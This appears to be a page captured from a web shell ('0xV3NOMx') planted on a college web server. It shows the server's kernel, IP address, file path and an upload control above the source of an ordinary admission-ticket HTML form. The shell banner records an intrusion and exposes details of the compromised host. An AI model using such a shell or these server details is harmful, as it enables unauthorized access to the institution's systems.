0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 3.12.153.240


Current Path : /var/www/html/college/html_modules/
Upload File :
Current File : /var/www/html/college/html_modules/admission_ticket.html

<script type="text/javascript">
  $(function () {
    $("#tabs").tabs();
  });
  $(function () {
    $("#sub_tabs").tabs();
  });
</script>
<div id="tabs">
  <ul>
    <li><a href="#Report_degree_list">General</a></li>
  </ul>

  <div style="padding-top: 10px;">
    <table class="content-tbl" cellpadding="5" cellspacing="2" width="100%">
      <tr>
        <td style="width: 140px;" align="right">Degree:</td>
        <td>
          <select
            type="text"
            id="report_admission_ticket_degree_code"
            class="textInputEnabled"
            style="width: 450px; height: 25px;"
            onchange="getAdmissionExamno()"
          ></select>
          <!-- <input
            type="text"
            id="report_admission_ticket_degree_code"
            style="width: 100px; height: 25px"
            maxlength="5"
            onkeypress="return pulsar(event,this);"
            onkeydown="return keyboardDegreePopup(event,this.id,$('#report_admission_ticket_degree_code').val())"
            onfocus="$g_focus_element='report_admission_ticket_degree_code';"
            onblur="getdegreeNames();"
          />&nbsp;&nbsp;
          <input
            type="text"
            id="report_admission_ticket_degree_name"
            readonly
            tabindex="-1"
            onfocus="$g_focus_element='report_admission_ticket_degree_name';"
            style="width: 300px; height: 25px"
          /> -->
        </td>
      </tr>
      <tr>
        <td align="right">Exam:</td>
        <td>
          <select id="exam" class="textInputEnabled" style="width: 150px; height: 25px;"></select>
        </td>
      </tr>
      <tr>
        <td align="right">Reg. No. Range.:</td>
        <td>
          <input
            type="text"
            value = '0'
            id="report_admission_ticket_start"
            style="width: 150px;text-align: center; text-transform: uppercase;"
            onkeyup="if (this.value.length > 15) {this.value = this.value.substr(0,15); }"
            onkeypress="return pulsar(event,this);"
            onkeydown="return KayboardGetRegno(event,this.id);"
            onfocus="$g_focus_element='report_admission_ticket_start';"
          />
          -
          <input
            type="text"
            value = "Z"
            id="report_admission_ticket_End"
            style="width: 150px;text-align: center; text-transform: uppercase;"
            onkeyup="if (this.value.length > 15) {this.value = this.value.substr(0,15); }"
            onkeypress="return pulsar(event,this);"
            onkeydown="return KayboardGetRegno(event,this.id);"
            onfocus="$g_focus_element='report_admission_ticket_End';"
          />
        </td>
      </tr>
      <tr style="display: none">
        <td align="right">Report Type :</td>
        <td>
          <select id="rptype" style="width: 110px; height: 25px">
            <option value="ALL">ALL</option>
            <option value="wp">With Photo</option>
            <option value="wop">Without Photo</option>
          </select>
        </td>
      </tr>
      <tr style="display: none">
        <td align="right">Print Hall Ticket:</td>
        <td align="left">
          <input
            type="radio"
            id="report_adt_one_per_page"
            name="report_at_one_per_page"
            checked
          />
          One Per Page
          <input
            type="radio"
            id="report_adt_two_per_page"
            name="report_at_one_per_page"
          />
          Two Per Page
        </td>
        <!--<td align ="left">
                <input type="button" id="report_admission_ticket_generate" value="Generate" style="width:70px" 
		        onclick='GenerateAdmissionTicket()';/>				  
			</td>-->
      </tr>
      <!-- 	<tr style="height:80px;">
				<td></td>
				<td>		
				 <input type="button" id="report_admission_ticket_generate" value="Generate" style="width: 70px" 
				 onclick='GenerateAdmissionTicket()';	/> 		
				</td>
			</tr> -->
    </table>
  </div>
</div>

<!-- <script type="text/javascript">
  $(function () {
    $("#tabs").tabs();
  });
  $(function () {
    $("#sub_tabs").tabs();
  });
</script>
<div id="tabs">
  <ul>
    <li><a href="#Report_degree_list">General</a></li>
  </ul>

  <div
    align="left"
    id="report_Admission_ticket_div"
    style="height: 250px; overflow: auto"
  >
    <table width="100%" border="0" cellspacing="1" cellpadding="1">
      <tr>
        <td align="right" style="width: 86px"> <p id = 'ldegcode'>Degree Code:</p></td>
        <td style="width: 280px">
          <input
            type="text"
            id="report_admission_ticket_degree_code"
            style="width: 100px; height: 25px"
            maxlength="5"
            onkeypress="return pulsar(event,this);"
            onkeydown="return keyboardDegreePopup(event,this.id,$('#report_admission_ticket_degree_code').val())"
            onfocus="$g_focus_element='report_admission_ticket_degree_code';"
            onblur="getdegreeNames();"
          />&nbsp;&nbsp;
          <input
            type="text"
            id="report_admission_ticket_degree_name"
            readonly
            tabindex="-1"
            onfocus="$g_focus_element='report_admission_ticket_degree_name';"
            style="width: 300px; height: 25px"
          />
        </td>
      </tr>
      <tr>
        <td align="right">Year / Semester :</td>
        <td>
          <select id="exam" style="width: 108px; height: 29px">
            <option value="all">ALL</option>
            <option value="A">First</option>
            <option value="B">Second</option>
            <option value="C">Third</option>
            <option value="D">Fourth</option>
            <option value="E">Fifth</option>
            <option value="F">Sixth</option>
            <option value="G">Seventh</option>
            <option value="H">Eight</option>
            <option value="I">Ninth</option>
            <option value="J">Tenth</option>
          </select>
        </td>
      </tr>
      <tr>
        <td align="right"><p id = 'lregno'>Roll No.:</p></td>
        <td>
          <input
            type="text"
            id="report_admission_ticket_start"
            style="width: 100px; height: 25px"
            onkeyup="if (this.value.length > 15) {this.value = this.value.substr(0,15); }"
            onkeypress="return pulsar(event,this);"
            onkeydown="return KayboardGetRegno(event,this.id);"
            onfocus="$g_focus_element='report_admission_ticket_start';"
          />
          -

          <input
            type="text"
            id="report_admission_ticket_End"
            style="width: 100px; height: 25px"
            onkeyup="if (this.value.length > 15) {this.value = this.value.substr(0,15); }"
            onkeypress="return pulsar(event,this);"
            onkeydown="return KayboardGetRegno(event,this.id);"
            onfocus="$g_focus_element='report_admission_ticket_End';"
          />
        </td>
      </tr>
      <tr style="display: none">
        <td align="right">Report Type :</td>
        <td>
          <select id="rptype" style="width: 110px; height: 25px">
            <option value="ALL">ALL</option>
            <option value="wp">With Photo</option>
            <option value="wop">Without Photo</option>
          </select>
        </td>
      </tr>
      <tr style="display: none">
        <td align="right">Print Hall Ticket:</td>
        <td align="left">
          <input
            type="radio"
            id="report_adt_one_per_page"
            name="report_at_one_per_page"
            checked
          />
          One Per Page
          <input
            type="radio"
            id="report_adt_two_per_page"
            name="report_at_one_per_page"
          />
          Two Per Page
        </td>
        <td align ="left">
                <input type="button" id="report_admission_ticket_generate" value="Generate" style="width:70px" 
		        onclick='GenerateAdmissionTicket()';/>				  
			</td>-->
      </tr>
      <!-- 	<tr style="height:80px;">
				<td></td>
				<td>		
				 <input type="button" id="report_admission_ticket_generate" value="Generate" style="width: 70px" 
				 onclick='GenerateAdmissionTicket()';	/> 		
				</td>
			</tr> -->
    </table>
  </div>
</div>